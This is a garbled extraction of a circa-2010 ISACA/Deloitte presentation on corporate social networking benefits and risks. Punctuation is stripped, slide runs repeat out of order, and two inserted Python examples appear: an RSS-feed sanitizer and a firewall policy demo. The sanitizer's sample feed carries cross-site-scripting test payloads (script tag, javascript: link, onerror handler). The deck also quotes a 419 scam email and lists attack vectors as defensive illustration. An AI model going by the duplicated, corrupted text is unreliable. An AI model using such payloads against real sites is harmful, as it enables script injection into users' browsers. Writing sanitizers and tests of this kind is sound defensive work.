bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
Risks and challenges

• Farmers and Mobsters
  – Top Facebook applications
    • Source: http://statistics.allfacebook.com/applications/leaderboard (March 2010)
    • There are now more than 500,000 active applications on the Facebook Platform

Rank  Name                     Monthly active users
   1  FarmVille                        82,580,911
   2  Static FBML                      46,827,021
   3  Birthday Cards                   41,904,049
   4  Café World                       30,032,716
   5  Facebook for iPhone              29,438,848
   6  Texas HoldEm Poker               28,332,917
   7  Slide FunSpace                   25,630,033
   8  Happy Aquarium (BETA)            24,915,971
   9  Mafia Wars                       24,704,179
  10  Causes                           24,317,292
Risks and challenges (cont.)

• New security concerns and attack vectors — a result of the shift in technology: Web services are empowering server-side core technology components, while Asynchronous JavaScript and XML ("AJAX") and Rich Internet Application ("RIA") clients are enhancing client-end interfaces in the browser itself.
• Top 10 Web 2.0 attack vectors — http://net-square.com/whitepapers/Top10_Web20_AV.pdf
  – Cross-site scripting (XSS) in AJAX, e.g. the Samy worm that exploited MySpace.com's XSS flaw
  – XML poisoning — poisoned XML blocks coming from the AJAX client
  – Malicious AJAX code execution — replay of cookies with each request
  – RSS/Atom injection — JavaScript injected into RSS feeds to attack the client browser
  – Web Services Description Language ("WSDL") scanning and enumeration
  – Client-side validation in AJAX routines — failing to perform server-side checks
  – Web services routing issues — compromise of intermediate nodes
  – Parameter manipulation with SOAP — web services consume information and variables from SOAP
  – XPATH injection in SOAP messages — bypass of authentication mechanisms
  – RIA thick client binary manipulation — issues with session management
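The RSS/Atom injection item above is the vector on this list that a feed consumer can neutralize on its own, before anything reaches the browser. The Python below is an added example, not code from the ISACA deck or from the Net-Square paper: it parses a constructed RSS feed and rebuilds each item's HTML description from an allow-list of tags and attributes, dropping script and style elements, event-handler attributes and javascript: links, and returns how many elements it removed so an audit log can flag a poisoned feed. The tag allow-list, the sample feed and the hostnames in it are constructed for the demo.

```python
"""Sanitize RSS item HTML before it is rendered in a browser.

Added example (not from the ISACA deck or the Net-Square paper): a
defensive filter for the "RSS/Atom injection" vector, in which script is
planted in a feed entry so that it executes in the reader's browser.
The feed below is constructed for the demo.
"""
from html import escape
from html.parser import HTMLParser
import xml.etree.ElementTree as ET

# Tags and attributes a feed reader actually needs to render an entry.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "a", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_SCHEMES = ("http://", "https://")
VOID_TAGS = {"br"}


class FeedHTMLSanitizer(HTMLParser):
    """Rebuild an HTML fragment keeping only allow-listed tags/attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = 0        # number of removed elements (for alerting)
        self._skip_depth = 0    # > 0 while inside <script>/<style> content

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1   # also discard the element's text
            self.dropped += 1
            return
        if tag not in ALLOWED_TAGS:
            self.dropped += 1       # e.g. <img onerror=...>, <iframe>
            return
        kept = []
        for name, value in attrs:
            # on* handlers and unknown attributes are never allowed;
            # href is kept only with an http(s) scheme (no javascript:).
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name == "href" and not (value or "").strip().lower().startswith(SAFE_SCHEMES):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip_depth = max(0, self._skip_depth - 1)
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self._skip_depth == 0:
            self.out.append(escape(data, quote=False))


def sanitize_html(fragment):
    """Return (safe_html, dropped_element_count) for one HTML fragment."""
    parser = FeedHTMLSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out), parser.dropped


def sanitize_feed(xml_text):
    """Return [(title, safe_description, dropped)] for each RSS <item>."""
    root = ET.fromstring(xml_text)   # feed is untrusted: size-limit it upstream
    items = []
    for item in root.iter("item"):
        title = item.findtext("title", default="")
        description = item.findtext("description", default="")
        safe, dropped = sanitize_html(description)
        items.append((escape(title, quote=False), safe, dropped))
    return items


# Constructed sample feed: one clean entry, one poisoned entry.
SAMPLE_FEED = """<?xml version="1.0"?>
<rss version="2.0"><channel><title>Constructed demo feed</title>
<item><title>Quarterly results</title>
<description><![CDATA[<p>Revenue up <b>12%</b>. <a href="https://example.com/report">Full report</a></p>]]></description></item>
<item><title>Poisoned entry</title>
<description><![CDATA[<p>Hi<script>alert(1)</script> <a href="javascript:alert(1)">Click</a><img src="x" onerror="alert(1)"></p>]]></description></item>
</channel></rss>"""

if __name__ == "__main__":
    for title, safe, dropped in sanitize_feed(SAMPLE_FEED):
        print(f"{title!r}: dropped={dropped} -> {safe}")
```

The rebuild-from-allow-list approach is deliberate: blocklisting `<script>` alone misses event-handler attributes and `javascript:` URLs, which is exactly what the second item carries. The `dropped` count is the audit hook; a feed that suddenly needs elements removed is worth a look.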
Risks and challenges (cont.)

• Example worms and phishing attacks affecting social networking sites
  – Koobface – targets Facebook, MySpace, hi5, Bebo, Twitter and other sites. Users are prompted to click on a URL purporting to be an update from Adobe, and a worm that looks for personal data is downloaded to the PC.
  – Fbaction – Facebook phishing attack that encourages users to sign up for fbaction.net using their Facebook credentials. Those credentials are then used to hijack the Facebook account.
Risks and challenges (cont.)

  – Boface – convinces users to click on a link pointing to a video, resulting in a download. Shortly after the download is complete, the user's Facebook account is hijacked and used as a means of spamming (and propagating the worm to) all their friends.
• Common element – they all take advantage of the implied trust that social networking users have in each other.
Risks and challenges (cont.)

"Has what we've learned about writing software the last 20 years been expressed in the design of Web 2.0? Of course not. It can't even be said to have a design. If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming, Web 2.0 would not be happening." – Marcus Ranum in InfoSec Magazine, May 2008

• Trust — Data reliability commonly causes issues for social media in the workplace. The Web has partially solved this with techniques such as inbound link counting, but reputation and voting systems are only starting to appear, often as plug-ins for social media tools.
• Attacks may also take advantage of URL shortening – bit.ly, tr.im, tinyurl.com, etc.
Risks and challenges (cont.)

• More on phishing — social networks are a target-rich environment
Risks and challenges (cont.)

• More on phishing — social networks are a target-rich environment (cont.)

"Dearest One…
Sorry for the nature of this email, please bear with me.
I am Natasha Kone, a 22 year old lady now. I was born on the 1st of January 1986 to the family of Kone. My father's name is Kamara Cone. He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively. I am their only child. When I was a kid I attended a private school and things were well for me and my parents. Things changed when I was in High School: my mother died on the 21st October 1994. My father then took me very special and gave me motherly care. As fate had it, my father died last year……" – See http://www.419legal.org for more details

• The 419 scams have evolved with the technology – now using LinkedIn to target specific individuals.
Risks and challenges (cont.)

• Reputation — Damage to company brand/reputation through inappropriate comments or remarks from employees
  – Even a lack of response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account.
  – Other examples include creating a social media program but not telling the rest of the company about it, so they may be unaware of any promotions or offers being publicized.
• Copyright violation — Third-party material such as essays, articles and photographs is used without written consent from the proprietor.
• Intellectual property theft — Inadvertent data leakage is harder to prevent given the one-to-many nature of Web 2.0 as a medium.
Risks and challenges (cont.)

• Failures in the use of social media — most companies that use social media don't approach it the way they would other mission-critical technology
  – At best, it can be said that most companies today are merely dabbling with social media…
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren't fully convinced of its value or have been slowed by the security and legal issues
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail

"Fully half of all Social Media investments will fail" — Gartner
Risks and challenges (cont.)

"When I discovered YouTube, I didn't work for five days. I did nothing. I viewed 'Cookie Monster Sings Chocolate Rain' about 1,000 times." – Michael Scott, from The Office

• Productivity — Users employ social media tools for nonproductive purposes such as socializing ("Social Notworking"). http://news.bbc.co.uk/2/hi/business/8325865.stm
Risks and challenges (cont.)

• Technical integration — Most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern
  – "Sign in using your account with": Facebook, Twitter, Myspace, Yahoo, Google, Windows Live ID, AOL, Blogger, WordPress, Netlog, OpenID, flickr
Risks and challenges (cont.)

• Information hoarding — In many industries, value is placed on what an employee knows that others do not. This belief prevents data sharing.
• Quantification — Researchers currently face challenges quantifying social networking benefits
  – Valuation techniques include, among others, Beckstrom's law, which states that "The value of a network equals the net value of each user's transactions conducted through that network, valued from the perspective of each user, and summed for all."
    Or, alternatively:
  – http://en.wikipedia.org/wiki/Beckstrom's_law
Risks and challenges (cont.)

• Litigation issues — Discrimination, defamation, violation of privacy and harassment are some of the potential concerns that might result in litigation.
A quick word on privacy

"People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time."
— Mark Zuckerberg, Facebook founder

"If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place."
— Eric Schmidt, CEO, Google Inc.
A quick word on privacy (cont.)

• Loss of Fourth Amendment protection
• Encryption of data storage unlikely
• Lack of encryption while data is in use
• Data remanence: limited attempt to address
Responding to the risks and challenges

• Policies and procedures
  – Acceptable use policy
    • Details how social networking sites and applications can be used
    • Defines consequences for failure to comply, e.g. "termination of employment and legal action"
• Risk assessment
  – Establish what information is most critical to the business
  – Understand how information might become vulnerable and how to protect it (data mapping)
Responding to the risks and challenges

• Education and awareness
  – Inform users of the information security risks involved and how to guard against them
    • For example, only install or run applications from trusted sources approved by the corporate IT department
Responding to the risks and challenges (cont.)

• Vulnerability assessments
  – Identifying, quantifying and prioritizing the potential vulnerabilities that social networking may present to the organization
• Firewalls
  – Historically, firewalls focused on ports, IP addresses and packets
  – But social networking applications operate on ports 80 & 443
  – Next-generation firewall technology offers granular control of social networking functionality:
    • Identify applications regardless of port, protocol, evasive tactic or SSL
    • Identify users regardless of IP address
    • Scan application content in real time
    • Visibility and policy control over application access
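The four next-generation firewall capabilities above are easiest to see as a policy that keys on who and what, rather than on port and IP address, which is all a legacy rule set can express for traffic on 80 and 443. The Python below is an added example, not vendor code and not part of the deck: it classifies constructed flow records on port 443 by the TLS SNI / HTTP Host name the firewall sees, resolves the user (not the source IP) to a group, and evaluates a small policy that lets marketing browse Facebook while blocking Facebook apps and URL shorteners for everyone. The application signatures, user-to-group map and policy table are constructed for the demo; a real product derives them from its signature database and directory integration.

```python
"""Application-aware policy evaluation for web traffic on ports 80/443.

Added example, not part of the ISACA deck or any vendor's firewall: it
shows why a port/IP rule set cannot express the controls on the slide
and how an application-identified, user-identified policy can.  Flow
records, hostnames and the category map are constructed for the demo.
"""
from dataclasses import dataclass

# Application identification: match on the TLS SNI / HTTP Host name the
# firewall sees, not on the destination port (every app below uses 443).
APP_SIGNATURES = {
    "facebook.com": "facebook",
    "apps.facebook.com": "facebook-apps",   # games / third-party apps sub-function
    "twitter.com": "twitter",
    "bit.ly": "url-shortener",
    "mail.corp.example": "corp-webmail",
}

# User identification comes from an identity source (directory login
# mapping), so the policy keys on the user's group, not the client IP.
USER_GROUPS = {
    "alice": "marketing",
    "bob": "engineering",
    "svc-backup": "service-accounts",
}

# Policy: (group, application) -> action.  "*" is a wildcard.
POLICY = {
    ("marketing", "facebook"): "allow",
    ("marketing", "twitter"): "allow",
    ("*", "facebook-apps"): "block",     # Farmers and Mobsters, for everyone
    ("*", "url-shortener"): "block",     # destination cannot be inspected
    ("*", "corp-webmail"): "allow",
    ("service-accounts", "*"): "block",  # service accounts never browse
}
DEFAULT_ACTION = "block"


@dataclass
class Flow:
    user: str          # resolved identity, not the source IP
    dst_port: int
    server_name: str   # TLS SNI or HTTP Host header


def identify_app(server_name):
    """Longest-suffix match, so 'apps.facebook.com' beats 'facebook.com'."""
    name = server_name.lower().rstrip(".")
    best = None
    for sig, app in APP_SIGNATURES.items():
        if name == sig or name.endswith("." + sig):
            if best is None or len(sig) > len(best[0]):
                best = (sig, app)
    return best[1] if best else "unknown"


def decide(flow):
    """Return (application, action).  Specific rules win over wildcards;
    a group-wide rule wins over an application-wide one."""
    app = identify_app(flow.server_name)
    group = USER_GROUPS.get(flow.user, "unknown")
    for key in ((group, app), (group, "*"), ("*", app)):
        if key in POLICY:
            return app, POLICY[key]
    return app, DEFAULT_ACTION


def port_only_decision(flow):
    """What a legacy port-based rule set can say about the same flow."""
    return "allow" if flow.dst_port in (80, 443) else "block"


def evaluate(flows):
    """Produce one log tuple per flow: (user, server_name, app, action)."""
    return [(f.user, f.server_name) + decide(f) for f in flows]


if __name__ == "__main__":
    # Constructed flows: all on 443, all "allow" to a port-based firewall.
    sample = [
        Flow("alice", 443, "www.facebook.com"),
        Flow("alice", 443, "apps.facebook.com"),
        Flow("bob", 443, "twitter.com"),
        Flow("svc-backup", 443, "mail.corp.example"),
    ]
    for user, host, app, action in evaluate(sample):
        print(f"{user:<11} {host:<20} app={app:<14} ngfw={action:<6} "
              f"port-only={port_only_decision(Flow(user, 443, host))}")
```

The point the slide makes falls out of the last column: every one of these flows is indistinguishable to a port-based rule, and only the application and user identity give the auditor anything to write a control against.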
What is next in the world of social networking
Where we are at today

• Enterprise social media has crossed the tipping point and is no longer considered an "emerging" technology

"The Hype Cycle" http://en.wikipedia.org/wiki/Hype_cycle
What's next in the world of social networking

• Increase in the use of mobile devices to access social networks
  – Over 600 million people will use their phone to access social networks by 2013, an increase of more than 400% over the 2009 figure of 140 million. Source — eMarketer
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example — Facebook Connect
• Social networks will become more pervasive — broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car's navigation system will be able to learn your friend's location and provide directions to them
Some further predictions

• Some quotes on social networks
  – "Probably the greatest transformative force in our generation, absent a major war." — Mark Zuckerberg, Facebook founder
  – "(Twitter is)… something important that has the potential to change the world, though we have a long way to go." — Biz Stone, co-founder of Twitter
Q&A
Today's presenters

Nelson Gibbs
Senior Manager
AERS – Audit & Enterprise Risk Services
Deloitte & Touche LLP
ngibbs@deloitte.com
+1 213 593 4241
Appendix

• Additional resources
  – Gopal Raj et al. "Web 2.0 reinvents corporate networking." Deloitte Consulting LLP (2008)
  – The Economist — A special report on social networking, January 30, 2010
  – Fraser, Matthew; Dutta, Soumitra (2008). Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – "Great Wall of Facebook: The Social Network's Plan to Dominate the Internet — and Keep Google Out" by Fred Vogelstein, Wired Magazine (June 2009) http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – "The Future is Social, Not Search, Facebook COO Says" by Ryan Singel, Wired Magazine (October 2009) http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media Web site — http://www.bcs.org/socialmedia
This presentation contains general information only, and Deloitte is not, by means of this presentation, rendering accounting, business, financial, investment, legal, tax or other professional advice or services. This presentation is not a substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may affect your business. Before making any decision or taking any action that may affect your business, you should consult a qualified professional advisor.

Deloitte, its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation.
Social network — More terminology (cont.)

Blogs
• Web sites where entries are made (such as in a journal or diary), displayed in reverse chronological order, often providing commentary or news on a particular subject
• Some function as personal online diaries or logbooks
• Combine text, images and links to other blogs and Web sites
• Typically provide archives in calendar form, local search, syndication feeds, reader comment posting, trackback links from other blogs, blogroll links to other recommended blogs, and categories of entries tagged for retrieval by topic
Social network — More terminology (cont.)

Microblogging
• Short, frequent posts with questions, information or current status
• Twitter (public) and Yammer (private) are two examples
• Social software (including Facebook, LinkedIn and MySpace) now prompts for "what's on your mind" or similar status or mood lines
Social network — More terminology (cont.)

Wikis
• Web sites which allow users to easily add, remove, edit and change most available content
• Effective for collaborative writing and self-service Web site creation and maintenance
Social network — More terminology (cont.)

Wikis (cont.)
• Wikipedia – perhaps the best known wiki
  – Launched on 15 January 2000
  – First edit on 16 January, followed by 1,000 articles in the first month
  – Now has 17 million articles in 270 languages, all written by volunteers
  – Billionth edit took place on 16 April 2010
  – Used by 400 million people every month
  – Claims to have 80,000 editors, although reports suggest that it has recently lost thousands, something Wikipedia disputes
  – Aims to grow to one billion users by 2015, with a focus on women and people in the developing world
  – Critics maintain that many entries are untrustworthy
  – But a disputed study has shown that for subjects such as science it comes as close as traditional encyclopedias

Statistics taken from http://www.bbc.co.uk/news/technology-12171977
Social network — More terminology (cont.)

Social networking software
• A range of tools which facilitate social networking
• Personal Web pages including bios, photos, interests, audio and video, links to friends, messages from friends and personal networks
Social network — More terminology (cont.)

Social networking software (cont.)
• Facebook – the biggest of them all
  – Over 500 million registered users
  – 50% of our active users log on to Facebook in any given day
  – About 70% of Facebook users are outside the US
  – More than 30 billion pieces of content (web links, news stories, blog posts, notes, photo albums, etc.) shared each month
  – People spend over 700 billion minutes per month on Facebook

Statistics taken from http://www.facebook.com/press/info.php?statistics (Sept 2010)

• As of March 13, 2010, Facebook was America's most popular site according to Experian Hitwise, with 7.1% of traffic compared to Google's 7.0%
Social network — More terminology (cont.)

Social bookmarking and tagging
• Sites which allow users to share links to sites with others
• Tags are metadata which classify content into categories
• Can be used to aid searches, create tag clouds and link disparate sources
Social network — More terminology (cont.)

Syndication and mashups
• Using feeds available from a Web site to provide an updated list of its content, in the form of a subscription, an embedded portion of a Web site, or a collection of disparate content on a particular topic
• RSS (Really Simple Syndication) or Atom syndication, with .rss, .xml or .rdf files used for the feeds
• Mashups combine data and feeds from multiple sources to provide a single integrated set of information, e.g. "data plotted on a map"
Social network — More terminology (cont.)

Videos and photos
• Online collections of videos and photos from users
• Users can upload, tag and rate content
Social Networking Companies

Social media                       Popular examples
Wikis                              Wikitravel, Wikipedia, wikiHow, WikiBooks, the TV IV
Blogs                              livejournal, WordPress, Blogger, Technorati, xanga
Social networking                  myspace.com, LinkedIn, facebook, friendster, plaxo
RSS (Really Simple Syndication)    newsgator, Bloglines, iGoogle, FeedBurner
Presence and microblogging         twitter, Pownce, jaiku, Hictu, tumblr
Social bookmarking and tagging     delicious, digg, reddit, newsvine, StumbleUpon
Online photo and video sharing     YouTube, flickr, shutterfly, last.fm, slideshare
Why and how companies are using social networking
Statistics on companies using social networking

Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies: US = 29 companies, Europe = 48 companies, Asia-Pacific = 20 companies, Latin America = 3 companies.
Source: http://www.burson-marsteller.com/Innovation_and_insights/blogs_and_podcasts/BM_Blog/Documents/Burson-Marsteller%202010%20Global%20Social%20Media%20Check-up%20white%20paper.pdf
Statistics on companies using social networking (cont.)
Companies typically adopt social media for three major benefits

1. Increase employee productivity and operational efficiencies
2. Foster creativity, innovation and collaboration
3. Enhance customer and partner relationships
Increase employee productivity and operational efficiencies

• Creates a lightweight institutional memory system, so a company's intellectual assets can be easily captured, stored and accessed
• Reduces the net volume of e-mail and allows users to "pull" information at their convenience, as opposed to spending time reading through mass e-mail chains
• Creates better-quality deliverables faster by drawing on the collective talents, knowledge and experiences of other employees around the world

Operational efficiencies
• A leading energy company realized approximately $250K in annual cost savings by conducting its employee conference virtually using social media

Improved reporting
• A global investment bank tightened reporting cycle times from several weeks to "about 30 seconds" per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
Increase employee productivity and operational efficiencies (cont.)

• American Red Cross
  – Designed to incite discussions around issues the American Red Cross cares about, describe actions individuals can take (online or offline) to help people prevent, prepare for and respond to emergencies, and give valuable information about preventing, preparing for and responding to emergencies. http://redcrosschat.org
Increase employee productivity and operational efficiencies (cont.)

• Deloitte's DWiki
  – Provides a safe, flexible knowledge creation and information sharing environment for all Deloitte practitioners, across country, practice and Deloitte organizational borders
  – Enhances the client service delivery capabilities of our Deloitte practitioners
  – Serves as a test environment for innovative concepts and solutions which expand the business interests of Deloitte

As used in this document, "Deloitte" means Deloitte LLP. Please see www.deloitte.com/us/about for a detailed description of the legal structure of Deloitte LLP and its subsidiaries.
Foster creativity, innovation and collaboration

• Harness product, process and service innovations by unlocking creativity and ideas from any area of the company
• The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
• Employees create unexpected connections with one another and expand their base of knowledge, experience and circle of trusted colleagues

Product innovation
• A leading high-tech manufacturer instituted a "submit-and-vote-for-your-favorite-idea" social community with its consumers, generating over 5,000 ideas and over 300,000 votes in its first three months and subsequently identifying new product offerings

Information capture
• A federal agency created an internal wiki to bolster the capture and dissemination of mission-critical information between field agents
Foster creativity, innovation and collaboration (cont.)

• Best Buy
  – A community of Best Buy employees who convene regularly to share knowledge, best practices, frustrations, aspirations and a few jokes. Community members include everyone from recent high school graduates to semi-retirees. https://mix.blueshirtnation.com
Foster creativity, innovation and collaboration (cont.)

• Deloitte's DStreet
  – Enterprise talent networking site – changing the way we connect with each other
  – Enables another way of collaboration and community building
  – Network, build new relationships and forge successful careers
  – Learn about colleagues and interesting ways to introduce yourself
  – Identify new connection points to create a basis for meaningful conversation
  – A new way of assembling the right team
Enhance customer and partner relationships

• Opens the lines of communication beyond typical spokespeople such as marketing, sales and PR, and provides an avenue for other important stakeholders (e.g. engineers, scientists, product managers) to gather firsthand feedback from customers
• Allows customers to access help beyond traditional means, with networks that provide peer support and a user-generated knowledgebase, while monitoring customer perception
• Provides a forum for collaborative business development, education and communications with vendors, OEMs and other partners
• Allows consumers who know your products and services best to become a part of the new offering development process

Revenue growth
• A major consumer goods company improved sales by 31.5% by including customer ratings, user-generated product reviews and other social features on its online storefront, also resulting in a 40% uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
Risks and challenges (cont.)
• Reputation — Damage to company brand/reputation through inappropriate comments or remarks from employees
  – Even a lack of a response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account
  – Other examples include creating a social media program but not telling the rest of the company about it, so they may be unaware of any promotions or offers being publicized
• Copyright violation — Third-party material such as essays, articles and photographs is used without written consent from the proprietor
• Intellectual Property theft — Inadvertent data leakage is harder to prevent because of the one-to-many nature of Web 2.0 as a medium
Risks and challenges (cont.)
• Failures in the use of Social Media — most companies that use Social Media don't approach it the way they would other mission-critical technology
  – At best, it can be said that most companies today are merely dabbling with Social Media…
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren't fully convinced of its value or have been slowed by the security and legal issues
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail
“Fully half of all Social Media investments will fail” — Gartner
Risks and challenges (cont.)
“When I discovered YouTube, I didn't work for five days. I did nothing. I viewed cookie monster sings chocolate rain about 1000 times.” — Michael Scott from The Office
• Productivity — Users employ social media tools for nonproductive purposes such as socializing (“Social Notworking”)
